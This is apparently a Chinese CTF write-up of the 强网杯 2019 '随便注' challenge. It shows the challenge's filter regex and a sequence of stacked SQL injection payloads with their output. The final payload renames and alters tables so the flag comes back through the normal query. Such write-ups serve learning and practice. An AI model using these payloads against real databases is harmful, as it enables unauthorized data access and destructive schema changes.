[强网杯 2019]随便注

4 篇文章 0 订阅
2 篇文章 0 订阅

[强网杯 2019]随便注

知识点

  • 堆叠注入

尝试了一下单引号闭合;存在堆叠注入;过滤了

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个注释

<!-- sqlmap是没有灵魂的 -->

于是试了下sqlmap,可以跑出数据库跑不出表;

动手:payload:`1’;show database;show tables;

array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}
_________________________________________________________________________________________
array(1) {
  [0]=>
  string(11) "ctftraining"
}

array(1) {
  [0]=>
  string(18) "information_schema"
}

array(1) {
  [0]=>
  string(5) "mysql"
}

array(1) {
  [0]=>
  string(18) "performance_schema"
}

array(1) {
  [0]=>
  string(9) "supersqli"
}

array(1) {
  [0]=>
  string(4) "test"
}
_________________________________________________________________________________________
array(1) {
  [0]=>
  string(16) "1919810931114514"
}

array(1) {
  [0]=>
  string(5) "words"
}

可以看见数据库;和当前数据库的表都出来了.

再用 1’; show columns from words ;和 1’; show columns from 1919810931114514;看一下表里面的字段

//woeds
array(6) {
  [0]=>
  string(2) "id"
  [1]=>
  string(7) "int(10)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}
array(6) {
  [0]=>
  string(4) "data"
  [1]=>
  string(11) "varchar(20)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}
 0';show columns from `1919810931114514`;

实际测试的时候发现纯数字的表要加上``符号

//1919810931114514
array(6) {
  [0]=>
  string(4) "flag"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

看一下大概知道我们现在语句查询的表是woeds,flag一个在1919810931114514这个表里面.

猜测一下查询语句大概是:select * form words where id = $_GET("inject")';

接下来就是要想法办法去查零位一张表里面的东西

1.将words表改名为word1或其它任意名字

2.1919810931114514改名为word

3.将新的word表插入一列,列名为id

4.将flag列改名为data

我们的payload

1';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

直接再查个1就可以得到flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值